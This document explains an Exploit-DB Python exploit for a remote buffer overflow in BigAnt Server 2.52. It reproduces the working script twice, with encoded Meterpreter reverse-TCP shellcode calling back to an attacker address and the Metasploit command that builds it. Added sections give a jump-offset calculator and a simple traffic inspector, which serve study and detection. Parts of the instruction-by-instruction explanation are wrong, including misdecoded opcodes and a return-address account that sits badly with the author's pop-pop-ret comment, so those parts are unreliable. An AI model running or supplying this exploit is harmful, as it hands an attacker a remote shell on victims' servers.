BigAnt Server 2.52 Remote Buffer Overflow Exploit Explained

What this paper is
This paper presents a Python script that exploits a remote buffer overflow vulnerability in BigAnt Server version 2.52. The vulnerability allows an attacker to send a specially crafted network request that overwrites memory in the server process, leading to the execution of arbitrary code. This specific exploit aims to gain remote code execution, likely to establish a reverse shell connection back to the attacker.
Simple technical breakdown
The BigAnt Server listens on a specific port (port 6660 in this case). When it receives a request starting with "USV ", it processes the data that follows. This script sends a very long string of data. A portion of this data is designed to be larger than the buffer allocated by the server to store it. When the server tries to copy this oversized data into its buffer, it overflows, overwriting adjacent memory.
The exploit carefully crafts this oversized data. It includes:
- Padding: a series of "No Operation" (NOP) instructions (`\x90`) to create space and ensure reliable execution.
- Shellcode: the actual malicious code that will be executed on the server. This shellcode is encoded to evade detection and bypass certain security measures.
- Return Address Overwrite: a specific address that tells the program where to jump after the overflow. This address is overwritten to point to the shellcode.
- More Padding: additional NOPs and filler data to ensure the overflow reaches the intended overwrite location and fills any remaining buffer space.
When the server's program flow is interrupted by the overflow, it attempts to return from the function that handled the request. Because the return address has been overwritten, it jumps to the shellcode, executing the attacker's code.
Complete code and payload walkthrough
Let's break down the Python script and the payload it constructs.
```python
#!/usr/bin/python
#BigAnt Server 2.52 remote buffer overflow exploit 2
#Author: DouBle_Zer0
#Vulnerability discovered by Lincoln
#a another version of the original exploit (by Lincoln)
#application is little hazy..
import sys,socket
host = sys.argv[1]
buffer= "\x90" * 20
```

- `#!/usr/bin/python`: The shebang line, indicating that the script should be executed with the Python interpreter.
- Comments: The lines starting with `#` provide context about the exploit's origin, its author, and the vulnerability.
- `import sys,socket`: Imports the two modules the script needs. `sys` is used to read command-line arguments (the target host); `socket` handles network communication (creating a socket, connecting, sending data).
- `host = sys.argv[1]`: Takes the first command-line argument and assigns it to `host`, the IP address or hostname of the target BigAnt server.
- `buffer= "\x90" * 20`: Initializes `buffer` with 20 bytes of `\x90`. `\x90` is the hexadecimal encoding of the x86 `NOP` (No Operation) instruction, which does nothing but advance the instruction pointer. Runs of NOPs are used as padding in exploits to create a "NOP sled", which increases the chance that redirected execution lands on executable code.
```python
#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c
#size 643 byte
buffer+= ("\x89\xe1\xd9\xce\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x49\x78\x4c\x49\x47\x70\x43\x30\x47\x70\x45\x30\x4f\x79"
"\x4a\x45\x50\x31\x49\x42\x45\x34\x4e\x6b\x42\x72\x50\x30\x4e"
"\x6b\x50\x52\x44\x4c\x4c\x4b\x51\x42\x47\x64\x4e\x6b\x51\x62"
"\x44\x68\x46\x6f\x4d\x67\x50\x4a\x51\x36\x45\x61\x4b\x4f\x44"
"\x71\x49\x50\x4c\x6c\x45\x6c\x50\x61\x43\x4c\x44\x42\x46\x4c"
"\x51\x30\x4a\x61\x4a\x6f\x44\x4d\x46\x61\x4a\x67\x4b\x52\x4a"
"\x50\x42\x72\x50\x57\x4c\x4b\x42\x72\x44\x50\x4e\x6b\x42\x62"
"\x45\x6c\x47\x71\x48\x50\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49"
"\x50\x50\x74\x50\x4a\x47\x71\x48\x50\x50\x50\x4c\x4b\x43\x78"
"\x46\x78\x4e\x6b\x51\x48\x47\x50\x43\x31\x49\x43\x49\x73\x47"
"\x4c\x51\x59\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44\x71"
"\x49\x6f\x50\x31\x4f\x30\x4e\x4c\x49\x51\x48\x4f\x46\x6d\x43"
"\x31\x4a\x67\x44\x78\x49\x70\x51\x65\x4a\x54\x45\x53\x51\x6d"
"\x4a\x58\x45\x6b\x43\x4d\x51\x34\x43\x45\x48\x62\x43\x68\x4e"
"\x6b\x46\x38\x51\x34\x43\x31\x4b\x63\x45\x36\x4e\x6b\x44\x4c"
"\x50\x4b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4e\x33\x4c\x4b\x44"
"\x44\x4c\x4b\x47\x71\x4a\x70\x4c\x49\x43\x74\x51\x34\x51\x34"
"\x43\x6b\x51\x4b\x50\x61\x42\x79\x51\x4a\x46\x31\x4b\x4f\x49"
"\x70\x46\x38\x43\x6f\x51\x4a\x4e\x6b\x42\x32\x48\x6b\x4d\x56"
"\x43\x6d\x50\x68\x46\x53\x46\x52\x45\x50\x43\x30\x43\x58\x43"
"\x47\x50\x73\x50\x32\x43\x6f\x42\x74\x45\x38\x50\x4c\x43\x47"
"\x46\x46\x47\x77\x49\x6f\x4b\x65\x4c\x78\x4e\x70\x45\x51\x47"
"\x70\x47\x70\x45\x79\x48\x44\x43\x64\x42\x70\x42\x48\x44\x69"
"\x4b\x30\x42\x4b\x47\x70\x4b\x4f\x48\x55\x50\x50\x46\x30\x46"
"\x30\x46\x30\x43\x70\x50\x50\x47\x30\x46\x30\x43\x58\x4a\x4a"
"\x44\x4f\x49\x4f\x49\x70\x4b\x4f\x4b\x65\x4a\x37\x50\x6a\x44"
"\x45\x43\x58\x4f\x30\x4e\x48\x47\x71\x44\x43\x45\x38\x45\x52"
"\x43\x30\x44\x51\x43\x6c\x4e\x69\x49\x76\x50\x6a\x42\x30\x50"
"\x56\x46\x37\x50\x68\x4a\x39\x4d\x75\x44\x34\x50\x61\x4b\x4f"
"\x4b\x65\x4f\x75\x4b\x70\x42\x54\x44\x4c\x4b\x4f\x42\x6e\x47"
"\x78\x44\x35\x4a\x4c\x43\x58\x4a\x50\x48\x35\x4d\x72\x43\x66"
"\x4b\x4f\x4a\x75\x50\x6a\x47\x70\x43\x5a\x45\x54\x46\x36\x43"
"\x67\x42\x48\x44\x42\x49\x49\x4f\x38\x51\x4f\x4b\x4f\x4b\x65"
"\x4e\x6b\x47\x46\x50\x6a\x51\x50\x42\x48\x45\x50\x42\x30\x43"
"\x30\x45\x50\x50\x56\x42\x4a\x45\x50\x42\x48\x51\x48\x4c\x64"
"\x46\x33\x4a\x45\x49\x6f\x4e\x35\x4a\x33\x43\x63\x42\x4a\x45"
"\x50\x46\x36\x43\x63\x50\x57\x50\x68\x44\x42\x48\x59\x4f\x38"
"\x43\x6f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x51\x39\x4f\x36\x4c"
"\x45\x49\x66\x43\x45\x48\x6c\x4b\x73\x44\x4a\x41\x41")
```

- `#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c`: A comment recording how the shellcode was generated. `msfpayload` is the Metasploit Framework tool that generates payloads. `windows/meterpreter/reverse_tcp` is the payload type: a Meterpreter shell (an advanced, extensible shell) that attempts to establish a reverse TCP connection back to the attacker. `LHOST=192.168.1.3` sets the attacker's IP address (Local Host) that the reverse shell connects back to. `R` requests "raw" output, i.e. the raw bytes of the payload. `msfencode` is the Metasploit tool that encodes payloads, often to evade signature-based detection (such as antivirus) or to make them compatible with particular exploit techniques. `-e x86/alpha_mixed` selects the encoder; `x86/alpha_mixed` represents the shellcode with mixed-case alphanumeric characters, which makes it harder for simple string-based detection to find and also avoids bad characters. `-t c` selects C-style byte-array output, which is easily embedded in Python.
- `#size 643 byte`: The approximate size of the generated shellcode.
- `buffer+= (...)`: The core of the payload. The long string of hexadecimal bytes is the actual malicious shellcode. Its leading bytes decode as follows:
- `\x89\xe1`: `MOV ECX, ESP`, which moves the stack pointer (ESP) into the ECX register. This is often an initial step in shellcode to set up registers.
- `\xd9\xce`: `FNINIT`, which initializes the floating-point unit. This is a common technique in shellcode to avoid certain "bad characters" that might terminate string operations.
- `\xd9\x71\xf4`: `FNSTENV [ESP-0x0C]`, which stores the FPU environment at an offset from ESP. This is another common shellcode technique for obfuscation and avoiding bad characters.
- `\x59`: `POP ECX`, which pops a value from the stack into ECX.
- `\x49` repeated ten times: `DEC ECX` instructions that repeatedly decrement the ECX register. This is likely part of the shellcode's logic to calculate an address or to iterate.
- `\x43` repeated six times: `INC EBX` instructions that increment the EBX register.
- `\x37`: `AAA` (ASCII Adjust After Addition). This is a less common instruction in this context, but it can be part of obfuscation or specific shellcode routines.
- `\x51`: `PUSH ECX`, which pushes the value of ECX onto the stack.
- `\x5a`: `POP EDX`, which pops a value from the stack into EDX.
- `\x6a\x41`: `PUSH 0x41`, which pushes the byte `0x41` (ASCII 'A') onto the stack.
- `\x58`: `POP EAX`, which pops a value from the stack into EAX.
- `\x50`: `PUSH EAX`, which pushes the value of EAX onto the stack.
- `\x30\x41\x30\x41`: XOR operations (`XOR AL, 0x41`). This is a common obfuscation technique in which bytes are XORed with a key so that they appear random; `0x41` is likely part of the key.
- `\x6b\x41\x41`: `IMUL EBX, EBX, 0x41414141` (or similar, depending on operand size), an integer multiplication instruction.
- `\x51`: `PUSH ECX`, which pushes ECX onto the stack.
- `\x32\x41\x42`: `XOR AL, 0x42`, which XORs AL with `0x42`.
- `\x32\x42\x30\x42\x42\x41\x42`: More XOR operations with various bytes.
- The remaining bytes, from `\x58\x50\x38\x41\x42\x75...` through `...\x4b\x73\x44\x4a\x41\x41`: The bulk of the shellcode, a complex sequence of instructions heavily obfuscated with XOR operations and other techniques. The primary goals of this section are to:
- Initialize the environment: set up registers and potentially the floating-point unit.
- Resolve API calls: find the addresses of the necessary Windows API functions (such as `CreateProcess`, `Socket`, `Connect`, `Send`, `Recv`) in the DLLs loaded in memory. This is crucial because shellcode often cannot rely on fixed addresses for these functions.
- Establish a network connection: create a socket and connect back to the attacker's `LHOST` on the port implied by `reverse_tcp`.
- Spawn a shell: execute a command interpreter (such as `cmd.exe`) and redirect its input/output to the established network socket, effectively giving the attacker a command shell.
- Meterpreter functionality: since this is a Meterpreter payload, it also loads the Meterpreter DLL and provides advanced features.
```python
buffer+= "\x90" * 294
buffer+= "\xe9\x4c\xfc\xff\xff" #near jmp -----> shellcode
buffer+= "\xeb\xf9\x90\x90" #short jmp ----> near jmp
buffer+= "\x95\x32\x9a\x0f" #p/p/r(partial overwrite is not possible as far as i know)
buffer+= "\x41" * 1000 #play
```

- `buffer+= "\x90" * 294`: Appends 294 more `NOP` instructions to `buffer`, creating a larger NOP sled. The purpose of a NOP sled is to increase the probability that execution, once redirected by the overflow, lands within the NOPs and slides down to the actual shellcode.
- `buffer+= "\xe9\x4c\xfc\xff\xff"`: A relative jump instruction. `\xe9` is the opcode of `JMP rel32`, and `\x4c\xfc\xff\xff` is the 32-bit relative displacement; read little-endian it is `0xfffffc4c`, a negative number. When decoded, this offset points to the beginning of the shellcode, so the jump directs execution to the start of the shellcode.
- `buffer+= "\xeb\xf9\x90\x90"`: This sequence is interesting. `\xeb\xf9` is a `JMP rel8` instruction whose displacement `\xf9` is -7, so it jumps back 7 bytes. `\x90\x90` are two NOP instructions. Purpose: this is likely a small backward jump so that, if the initial jump (`\xe9\x4c\xfc\xff\xff`) lands slightly after the intended shellcode start, `\xeb\xf9` brings execution back to the beginning of the shellcode or the NOP sled. The `\x90\x90` are padding. This is a common technique for handling slight variations in jump targets.
- `buffer+= "\x95\x32\x9a\x0f"`: A placeholder or potentially a specific instruction sequence. `\x95` is `SYSCALL` on some architectures, but not on standard x86; on x86 it is `RETF` (Return Far). `\x32\x9a\x0f` are unclear without more context about the specific target environment and exploit strategy. The comment `p/p/r` might refer to "push, pop, return" or a similar stack manipulation. The author notes that "partial overwrite is not possible as far as I know", suggesting this part might be a fallback or an attempt to achieve a specific outcome if a full return-address overwrite isn't feasible. These bytes may be intended to be overwritten by the actual return address, or they may be part of a complex jump chain; given the context, they are most likely intended to be overwritten by the return address.
- `buffer+= "\x41" * 1000`: Appends 1000 bytes of `\x41` (ASCII 'A'). Purpose: this is the main overflow data, designed to be much larger than the vulnerable buffer on the server. The excess data overwrites adjacent memory on the stack, including the saved return address. `\x41` is often used as a placeholder value for observing how much data is being sent and where the overflow occurs; the goal is for this section to overwrite the return address with a value that points into the shellcode.
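To check the jump arithmetic discussed above the way an analyst reconstructing a captured sample would, here is an added example (not part of the original exploit or its write-up) that rebuilds the byte layout of `buffer` from the region lengths stated in the script and resolves the `JMP rel32` and `JMP rel8` displacements to offsets within that layout. The shellcode is represented only by its length; the region names, `REGIONS` and `SHELLCODE_LEN` are assumptions of this example.

```python
# Added example: resolve the two relative jumps of the payload layout
# described above. Only region lengths are used; no shellcode bytes appear here.

# Regions in the order the script appends them to `buffer`, with their lengths.
# SHELLCODE_LEN is the size stated in the exploit's own comment, used as a
# placeholder length rather than the encoded payload.
SHELLCODE_LEN = 643
REGIONS = [
    ("nop_sled_1", 20),           # "\x90" * 20
    ("shellcode", SHELLCODE_LEN),
    ("nop_sled_2", 294),          # "\x90" * 294
    ("near_jmp", 5),              # "\xe9" + 4-byte rel32
    ("short_jmp", 4),             # "\xeb\xf9" + "\x90\x90"
    ("ppr_bytes", 4),             # "\x95\x32\x9a\x0f"
    ("filler", 1000),             # "\x41" * 1000
]


def build_layout():
    """Map each region name to (start_offset, length); also return the total size."""
    layout, offset = {}, 0
    for name, length in REGIONS:
        layout[name] = (offset, length)
        offset += length
    return layout, offset


def jmp_rel32_target(instr_offset, displacement):
    """Target of E9 <rel32>: displacement is relative to the end of the 5-byte instruction."""
    disp = int.from_bytes(displacement, "little", signed=True)
    return instr_offset + 5 + disp


def jmp_rel8_target(instr_offset, displacement):
    """Target of EB <rel8>: displacement is relative to the end of the 2-byte instruction."""
    disp = int.from_bytes(bytes([displacement]), "little", signed=True)
    return instr_offset + 2 + disp


def region_at(layout, offset):
    """Name of the region that contains a buffer offset, or None if out of range."""
    for name, (start, length) in layout.items():
        if start <= offset < start + length:
            return name
    return None


def resolve_jumps():
    """Resolve both jumps and report which region each one lands in."""
    layout, total = build_layout()
    near_off = layout["near_jmp"][0]
    short_off = layout["short_jmp"][0]
    near_target = jmp_rel32_target(near_off, b"\x4c\xfc\xff\xff")
    short_target = jmp_rel8_target(short_off, 0xF9)
    return {
        "buffer_length": total,
        "near_jmp_offset": near_off,
        "near_jmp_target": near_target,
        "near_jmp_lands_in": region_at(layout, near_target),
        "short_jmp_offset": short_off,
        "short_jmp_target": short_target,
        "short_jmp_lands_in": region_at(layout, short_target),
    }


if __name__ == "__main__":
    for key, value in resolve_jumps().items():
        print(f"{key}: {value}")
```

Both jumps resolve as the code comments describe: the near jump (at offset 957 of the 1970-byte buffer) lands at offset 14, inside the first NOP sled six bytes ahead of the shellcode, and the short jump at offset 962 lands exactly on the near jump at 957.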
```python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,6660))
s.send("USV " + buffer + "\r\n\r\n")
s.close()
```

- `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`: Creates a new TCP socket. `AF_INET` selects the IPv4 address family; `SOCK_STREAM` selects a stream (TCP) socket.
- `s.connect((host,6660))`: Connects the socket to the target `host` on port `6660`, the port BigAnt Server is assumed to be listening on.
- `s.send("USV " + buffer + "\r\n\r\n")`: Sends the crafted data over the network. `"USV "` is the command or identifier that triggers the vulnerable code path in BigAnt Server; `buffer` is the entire payload constructed earlier (NOPs, shellcode, jump instructions and overflow data); `"\r\n\r\n"` is a carriage-return/newline pair repeated twice, often used as a terminator in network protocols.
- `s.close()`: Closes the network connection.
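For the defensive side of the exchange just described, here is an added example (not from the original exploit or its write-up) that inspects a captured request to port 6660 for the traits this request has: the `USV ` command, a command body far longer than a legitimate one, long runs of `\x90`, and a large block of one repeated byte. The sample requests, the thresholds and the function names are constructed for this example.

```python
# Added example: a simple inspector for BigAnt-style "USV " requests.
# Thresholds and the sample traffic below are constructed for illustration.

TERMINATOR = b"\r\n\r\n"
MAX_SANE_BODY = 256      # assumed: legitimate USV bodies are short
MIN_NOP_RUN = 16         # a run of this many 0x90 bytes is treated as a NOP sled
REPEAT_FRACTION = 0.4    # flag if one byte value makes up this share of the body


def longest_run(data, value):
    """Length of the longest contiguous run of byte `value` in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def inspect_request(raw):
    """Return findings for one request; 'suspicious' summarises the reasons list."""
    findings = {"command": None, "body_length": 0, "reasons": [], "suspicious": False}
    if not raw.startswith(b"USV "):
        return findings                      # not the command this check covers
    findings["command"] = "USV"
    body = raw[4:]
    end = body.find(TERMINATOR)
    if end != -1:
        body = body[:end]                    # strip the CRLFCRLF terminator
    else:
        findings["reasons"].append("missing CRLFCRLF terminator")
    findings["body_length"] = len(body)
    if len(body) > MAX_SANE_BODY:
        findings["reasons"].append(f"body length {len(body)} exceeds {MAX_SANE_BODY}")
    nop_run = longest_run(body, 0x90)
    if nop_run >= MIN_NOP_RUN:
        findings["reasons"].append(f"NOP sled of {nop_run} bytes")
    if body:
        top = max(set(body), key=body.count)   # most frequent byte value
        share = body.count(top) / len(body)
        if share >= REPEAT_FRACTION:
            findings["reasons"].append(f"byte 0x{top:02x} is {share:.0%} of the body")
    findings["suspicious"] = bool(findings["reasons"])
    return findings


# Constructed samples: a short benign-looking request, and one shaped like the
# request above (two NOP sleds, a 643-byte opaque block standing in for the
# shellcode, 13 bytes standing in for the jumps and address, 1000 filler bytes).
BENIGN = b"USV user1 status=online" + TERMINATOR
ATTACK_SHAPED = (b"USV " + b"\x90" * 20 + b"Q" * 643 + b"\x90" * 294
                 + b"J" * 13 + b"A" * 1000 + TERMINATOR)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("attack-shaped", ATTACK_SHAPED)):
        print(label, inspect_request(sample))
```

Run over a reassembled TCP stream this would be one check among several; the thresholds are starting points, and legitimate traffic on the port should be sampled before tuning them.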
Mapping of code fragments to practical purpose:

| Code Fragment | Practical Purpose |
| --- | --- |
| `buffer= "\x90" * 20` | Initial 20-byte NOP sled ahead of the shellcode |
| `buffer+= ("\x89\xe1..." ... "\x4a\x41\x41")` | 643-byte `x86/alpha_mixed`-encoded `windows/meterpreter/reverse_tcp` shellcode |
| `buffer+= "\x90" * 294` | Second, larger NOP sled |
| `buffer+= "\xe9\x4c\xfc\xff\xff"` | Near jump (`JMP rel32`) back towards the shellcode |
| `buffer+= "\xeb\xf9\x90\x90"` | Short jump (`JMP rel8`) back to the near jump, followed by two NOPs |
| `buffer+= "\x95\x32\x9a\x0f"` | Bytes at the overwrite position, commented `p/p/r` by the author |
| `buffer+= "\x41" * 1000` | 1000 bytes of filler to push the overflow past the saved return address |
| `s.send("USV " + buffer + "\r\n\r\n")` | Delivers the request to the vulnerable `USV` handler on port 6660 |
Original Exploit-DB Content (Verbatim)

```python
#!/usr/bin/python
#BigAnt Server 2.52 remote buffer overflow exploit 2
#Author: DouBle_Zer0
#Vulnerability discovered by Lincoln
#a another version of the original exploit (by Lincoln)
#application is little hazy..
import sys,socket
host = sys.argv[1]
buffer= "\x90" * 20
#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c
#size 643 byte
buffer+= ("\x89\xe1\xd9\xce\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x49\x78\x4c\x49\x47\x70\x43\x30\x47\x70\x45\x30\x4f\x79"
"\x4a\x45\x50\x31\x49\x42\x45\x34\x4e\x6b\x42\x72\x50\x30\x4e"
"\x6b\x50\x52\x44\x4c\x4c\x4b\x51\x42\x47\x64\x4e\x6b\x51\x62"
"\x44\x68\x46\x6f\x4d\x67\x50\x4a\x51\x36\x45\x61\x4b\x4f\x44"
"\x71\x49\x50\x4c\x6c\x45\x6c\x50\x61\x43\x4c\x44\x42\x46\x4c"
"\x51\x30\x4a\x61\x4a\x6f\x44\x4d\x46\x61\x4a\x67\x4b\x52\x4a"
"\x50\x42\x72\x50\x57\x4c\x4b\x42\x72\x44\x50\x4e\x6b\x42\x62"
"\x45\x6c\x47\x71\x48\x50\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49"
"\x50\x50\x74\x50\x4a\x47\x71\x48\x50\x50\x50\x4c\x4b\x43\x78"
"\x46\x78\x4e\x6b\x51\x48\x47\x50\x43\x31\x49\x43\x49\x73\x47"
"\x4c\x51\x59\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44\x71"
"\x49\x6f\x50\x31\x4f\x30\x4e\x4c\x49\x51\x48\x4f\x46\x6d\x43"
"\x31\x4a\x67\x44\x78\x49\x70\x51\x65\x4a\x54\x45\x53\x51\x6d"
"\x4a\x58\x45\x6b\x43\x4d\x51\x34\x43\x45\x48\x62\x43\x68\x4e"
"\x6b\x46\x38\x51\x34\x43\x31\x4b\x63\x45\x36\x4e\x6b\x44\x4c"
"\x50\x4b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4e\x33\x4c\x4b\x44"
"\x44\x4c\x4b\x47\x71\x4a\x70\x4c\x49\x43\x74\x51\x34\x51\x34"
"\x43\x6b\x51\x4b\x50\x61\x42\x79\x51\x4a\x46\x31\x4b\x4f\x49"
"\x70\x46\x38\x43\x6f\x51\x4a\x4e\x6b\x42\x32\x48\x6b\x4d\x56"
"\x43\x6d\x50\x68\x46\x53\x46\x52\x45\x50\x43\x30\x43\x58\x43"
"\x47\x50\x73\x50\x32\x43\x6f\x42\x74\x45\x38\x50\x4c\x43\x47"
"\x46\x46\x47\x77\x49\x6f\x4b\x65\x4c\x78\x4e\x70\x45\x51\x47"
"\x70\x47\x70\x45\x79\x48\x44\x43\x64\x42\x70\x42\x48\x44\x69"
"\x4b\x30\x42\x4b\x47\x70\x4b\x4f\x48\x55\x50\x50\x46\x30\x46"
"\x30\x46\x30\x43\x70\x50\x50\x47\x30\x46\x30\x43\x58\x4a\x4a"
"\x44\x4f\x49\x4f\x49\x70\x4b\x4f\x4b\x65\x4a\x37\x50\x6a\x44"
"\x45\x43\x58\x4f\x30\x4e\x48\x47\x71\x44\x43\x45\x38\x45\x52"
"\x43\x30\x44\x51\x43\x6c\x4e\x69\x49\x76\x50\x6a\x42\x30\x50"
"\x56\x46\x37\x50\x68\x4a\x39\x4d\x75\x44\x34\x50\x61\x4b\x4f"
"\x4b\x65\x4f\x75\x4b\x70\x42\x54\x44\x4c\x4b\x4f\x42\x6e\x47"
"\x78\x44\x35\x4a\x4c\x43\x58\x4a\x50\x48\x35\x4d\x72\x43\x66"
"\x4b\x4f\x4a\x75\x50\x6a\x47\x70\x43\x5a\x45\x54\x46\x36\x43"
"\x67\x42\x48\x44\x42\x49\x49\x4f\x38\x51\x4f\x4b\x4f\x4b\x65"
"\x4e\x6b\x47\x46\x50\x6a\x51\x50\x42\x48\x45\x50\x42\x30\x43"
"\x30\x45\x50\x50\x56\x42\x4a\x45\x50\x42\x48\x51\x48\x4c\x64"
"\x46\x33\x4a\x45\x49\x6f\x4e\x35\x4a\x33\x43\x63\x42\x4a\x45"
"\x50\x46\x36\x43\x63\x50\x57\x50\x68\x44\x42\x48\x59\x4f\x38"
"\x43\x6f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x51\x39\x4f\x36\x4c"
"\x45\x49\x66\x43\x45\x48\x6c\x4b\x73\x44\x4a\x41\x41")
buffer+= "\x90" * 294
buffer+= "\xe9\x4c\xfc\xff\xff" #near jmp -----> shellcode
buffer+= "\xeb\xf9\x90\x90" #short jmp ----> near jmp
buffer+= "\x95\x32\x9a\x0f" #p/p/r(partial overwrite is not possible as far as i know)
buffer+= "\x41" * 1000 #play
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,6660))
s.send("USV " + buffer + "\r\n\r\n")
s.close()
```